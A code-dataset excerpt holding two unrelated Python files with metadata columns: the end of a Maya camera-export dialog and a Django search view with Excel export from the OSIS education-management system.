def _on_reload(self, *args):
self._populate_cameras()
def _populate_cameras(self):
previous = str(self._cameras.currentText())
selection = set(cmds.ls(sl=True, type='transform') or ())
self._cameras.clear()
for camera in cmds.ls(type="camera"):
transform = cmds.listRelatives(camera, parent=True, fullPath=True)[0]
self._cameras.addItem(transform, (transform, camera))
if (previous and previous == transform) or (not previous and transform in selection):
self._cameras.setCurrentIndex(self._cameras.count() - 1)
self._update_status()
def _on_cameras_changed(self, *args):
self._update_status()
def _update_status(self):
transform = str(self._cameras.currentText())
counts = {}
for node in get_nodes_to_export(transform):
type_ = cmds.nodeType(node)
counts[type_] = counts.get(type_, 0) + 1
self._summary.setText('\n'.join('%dx %s' % (c, n) for n, c in sorted(counts.iteritems())))
def _on_export(self, *args):
# Other tools don't like cameras named the same as their transform,
# so this is a good place to warn about it.
transform, camera = self._cameras.itemData(self._cameras.currentIndex()).toPyObject()
transform_name = transform.rsplit('|', 1)[-1]
camera_name = camera.rsplit('|', 1)[-1]
if transform_name == camera_name:
res = QtGui.QMessageBox.warning(self, "Camera Name Collision",
"The selected camera and its transform have the same name, "
"which can cause issues with other tools.\n\nContinue anyways?",
"Abort", "Continue")
if not res:
return
try:
publisher = self._exporter_widget.export(
camera=camera,
bake_to_world_space=self._worldSpaceBox.isChecked()
)
except PublishSafetyError:
return
if publisher:
sgpublish.uiutils.announce_publish_success(publisher)
self.close()
def _warning(self, message):
cmds.warning(message)
def _error(self, message):
cmds.confirmDialog(title='Scene Name Error', message=message, icon='critical')
cmds.error(message)
def __before_reload__():
if dialog:
dialog.close()
dialog = None
def run():
global dialog
if dialog:
dialog.close()
# Be cautious if the scene was never saved
filename = cmds.file(query=True, sceneName=True)
if not filename:
res = QtGui.QMessageBox.warning(None, 'Unsaved Scene', 'This scene has not beed saved. Continue anyways?',
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,
QtGui.QMessageBox.No
)
if res & QtGui.QMessageBox.No:
return
workspace = cmds.workspace(q=True, rootDirectory=True)
if filename and not filename.startswith(workspace):
res = QtGui.QMessageBox.warning(None, 'Mismatched Workspace', 'This scene is not from the current workspace. Continue anyways?',
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,
QtGui.QMessageBox.No
)
if res & QtGui.QMessageBox.No:
return
dialog = Dialog()
dialog.show()
| bsd-3-clause | 3,548,856,518,298,732,000 | 34.159341 | 136 | 0.609783 | false | 4.128387 | false | false | false |
uclouvain/osis | program_management/views/search.py | 1 | 5873 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2021 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import itertools
from collections import OrderedDict
from dal import autocomplete
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin
from django.shortcuts import get_object_or_404
from django.utils.html import format_html
from django.utils.translation import gettext_lazy as _, get_language
from django_filters.views import FilterView
from base.business.education_group import ORDER_COL, ORDER_DIRECTION, create_xls_administrative_data
from program_management.business.xls_customized import create_customized_xls, TRAINING_LIST_CUSTOMIZABLE_PARAMETERS
from base.forms.search.search_form import get_research_criteria
from base.models.academic_year import starting_academic_year
from base.models.education_group_type import EducationGroupType
from base.models.enums import education_group_categories
from base.models.person import Person
from base.utils.cache import CacheFilterMixin
from base.utils.search import SearchMixin, RenderToExcel
from education_group.models.group_year import GroupYear
from program_management.api.serializers.education_group import EducationGroupSerializer
from program_management.forms.education_groups import GroupFilter
def _get_filter(form):
return OrderedDict(itertools.chain(get_research_criteria(form)))
def _create_xls_administrative_data(view_obj, context, **response_kwargs):
user = view_obj.request.user
egys = context["filter"].qs
filters = _get_filter(context["form"])
# FIXME: use ordering args in filter_form! Remove xls_order_col/xls_order property
order = {ORDER_COL: view_obj.request.GET.get('xls_order_col'),
ORDER_DIRECTION: view_obj.request.GET.get('xls_order')}
return create_xls_administrative_data(user, egys, filters, order, get_language())
def _create_xls_customized(view_obj, context, **response_kwargs):
user = view_obj.request.user
egys = context["filter"].qs
filters = _get_filter(context["form"])
# FIXME: use ordering args in filter_form! Remove xls_order_col/xls_order property
order = {ORDER_COL: view_obj.request.GET.get('xls_order_col'),
ORDER_DIRECTION: view_obj.request.GET.get('xls_order')}
return create_customized_xls(user, egys, filters, order, _get_xls_parameters(view_obj))
def _get_xls_parameters(view_obj):
other_params = []
for parameter in TRAINING_LIST_CUSTOMIZABLE_PARAMETERS:
if view_obj.request.GET.get(parameter) == 'true':
other_params.append(parameter)
return other_params
@RenderToExcel("xls_administrative", _create_xls_administrative_data)
@RenderToExcel("xls_customized", _create_xls_customized)
class EducationGroupSearch(LoginRequiredMixin, PermissionRequiredMixin, CacheFilterMixin, SearchMixin, FilterView):
model = GroupYear
template_name = "search.html"
raise_exception = False
filterset_class = GroupFilter
permission_required = 'base.view_educationgroup'
serializer_class = EducationGroupSerializer
cache_search = True
cache_exclude_params = ['xls_status']
def get_context_data(self, **kwargs):
person = get_object_or_404(Person, user=self.request.user)
context = super().get_context_data(**kwargs)
starting_ac = starting_academic_year()
if context["paginator"].count == 0 and self.request.GET:
messages.add_message(self.request, messages.WARNING, _('No result!'))
context.update({
'person': person,
'form': context["filter"].form,
'object_list_count': context["paginator"].count,
'current_academic_year': starting_ac,
'items_per_page': context["paginator"].per_page,
'enums': education_group_categories,
})
return context
class EducationGroupTypeAutoComplete(LoginRequiredMixin, autocomplete.Select2QuerySetView):
def get_queryset(self):
if not self.request.user.is_authenticated:
return EducationGroupType.objects.none()
qs = EducationGroupType.objects.all()
category = self.forwarded.get('category', None)
if category:
qs = qs.filter(category=category)
if self.q:
# Filtering must be done in python because translated value.
ids_to_keep = {result.pk for result in qs if self.q.lower() in result.get_name_display().lower()}
qs = qs.filter(id__in=ids_to_keep)
qs = qs.order_by_translated_name()
return qs
def get_result_label(self, result):
return format_html('{}', result.get_name_display())
| agpl-3.0 | 3,858,530,714,304,342,000 | 43.150376 | 115 | 0.701635 | false | 3.858081 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.